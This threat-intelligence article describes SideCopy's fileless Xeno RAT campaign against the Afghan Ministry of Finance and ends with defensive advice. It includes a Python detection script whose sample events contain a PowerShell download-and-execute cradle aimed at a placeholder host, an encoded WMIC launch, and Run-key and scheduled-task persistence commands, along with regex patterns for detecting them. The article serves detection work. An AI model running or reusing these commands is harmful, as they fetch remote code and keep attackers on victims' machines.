
SideCopy, a Pakistani APT group, has been observed deploying the Xeno RAT against the Afghan Ministry of Finance in a spear‑phishing campaign that began in early June 2026. According to Seqrite's analysis, the attack uses malicious emails with Pashto‑language lures to trick officials into opening a booby‑trapped shortcut file that delivers the remote access tool.
Xeno RAT operates as a fileless payload, leveraging legitimate Windows utilities such as PowerShell and WMIC to download and execute additional stages directly in memory. The initial vector is a .lnk file that, when clicked, runs a command line that contacts a command‑and‑control server and pulls down the RAT without touching disk.
The malware also drops a decoy document that appears to be an official finance report, keeping the victim's attention while the malicious code establishes persistence through a registry Run key or a scheduled task. No CVE applies to this chain: it relies on abusing legitimate, already‑installed tools rather than exploiting a software vulnerability.
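Because the chain described above leaves no new binary on disk, detection has to key on process behaviour rather than file hashes: a shortcut opened from Explorer spawning PowerShell or WMIC with a download‑and‑execute or encoded command line, followed by a Run‑key write or a scheduled‑task creation. The following is an added example of that detection logic, not code from Seqrite, Dark Reading or any vendor product. It runs over constructed Sysmon‑style process‑creation records; the process names, task name and `c2.invalid` host are hypothetical placeholders, not indicators from the campaign.

```python
"""Triage process-creation events for the LOLBin launch + persistence pattern.

Added example (not from the page's sources). Input records mimic the
ParentImage / Image / CommandLine fields of Sysmon Event ID 1; the values
below are constructed for illustration and are not observed IoCs.
"""
import re

# Constructed sample events: two shortcut-style launches, two persistence
# writes, and one benign Office launch that must not be flagged.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                    "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/<stage>')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "powershell -enc <base64>"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                    r'/v Updater /t REG_SZ /d "<launcher>"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /sc onlogon /tn FinanceSync /tr "<launcher>"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\budget_report.docx"'},
]

# Living-off-the-land binaries a double-clicked .lnk typically hands off to.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe"}
# A shortcut opened from the desktop or a mail attachment runs under Explorer.
SHELL_PARENTS = {"explorer.exe"}

# Download cradles and in-memory execution primitives.
DOWNLOAD_EXEC_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|start-bitstransfer", re.I)
# -e / -ec / -en / -enc / -encodedcommand, but not -ExecutionPolicy.
ENCODED_RE = re.compile(r"\s-e(?:c|n|nc|ncodedcommand)?\b|frombase64string", re.I)
WMI_CREATE_RE = re.compile(r"process\s+call\s+create", re.I)
RUNKEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.I)
SCHTASK_RE = re.compile(r"schtasks(?:\.exe)?\s+/create", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return the list of behaviour tags that apply to one event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    tags = []
    if image in LOLBINS and parent in SHELL_PARENTS:
        tags.append("lolbin_from_shell")          # what a .lnk launch looks like
    if image in LOLBINS and DOWNLOAD_EXEC_RE.search(cmd):
        tags.append("download_execute")           # fileless stage pull
    if WMI_CREATE_RE.search(cmd):
        tags.append("wmi_process_create")
    if ENCODED_RE.search(cmd):
        tags.append("encoded_command")
    if RUNKEY_RE.search(cmd):
        tags.append("runkey_persistence")
    if image == "schtasks.exe" and SCHTASK_RE.search(cmd):
        tags.append("schtask_persistence")
    return tags


def severity(tags):
    """'high' for a shell-spawned LOLBin with a staging indicator, 'medium'
    for staging or persistence on its own, None for nothing of interest."""
    launch = "lolbin_from_shell" in tags
    stage = {"download_execute", "wmi_process_create", "encoded_command"} & set(tags)
    persist = {"runkey_persistence", "schtask_persistence"} & set(tags)
    if launch and stage:
        return "high"
    if stage or persist:
        return "medium"
    return None


def triage(events):
    """Map event index -> (severity, tags) for every event worth a look."""
    findings = {}
    for i, ev in enumerate(events):
        tags = classify_event(ev)
        sev = severity(tags)
        if sev:
            findings[i] = (sev, tags)
    return findings


if __name__ == "__main__":
    for idx, (sev, tags) in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {sev:6} {', '.join(tags)}")
```

Note the deliberate caveat in `severity()`: Explorer launching PowerShell is common for administrators and signed scripts, so `lolbin_from_shell` alone never fires; it is the combination with a download cradle or encoded command that reproduces the in‑memory delivery described above. Correlating a high finding with a later Run‑key or scheduled‑task event from the same logon session is the natural next step.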
Researchers at Seqrite first highlighted the activity on 3 June 2026, noting that the campaign aligns with SideCopy’s historic focus on South Asian governmental targets. Dark Reading reported the operation, emphasizing the group’s use of localized lures to increase success rates against Afghan officials.
Afghan governmental networks remain exposed due to limited cyber‑security staffing and a reliance on legacy systems inherited after the 2021 transition, which gives threat actors a reliable foothold for espionage. The campaign demonstrates how adversaries adapt social engineering to regional languages to bypass generic defenses.
Defenders should enforce strict email attachment policies, block execution of .lnk and .js files from external sources, and enable PowerShell logging and constrained language mode. Additionally, maintaining up‑to‑date endpoint detection and response solutions and conducting regular phishing awareness training can reduce the likelihood of successful fileless intrusions.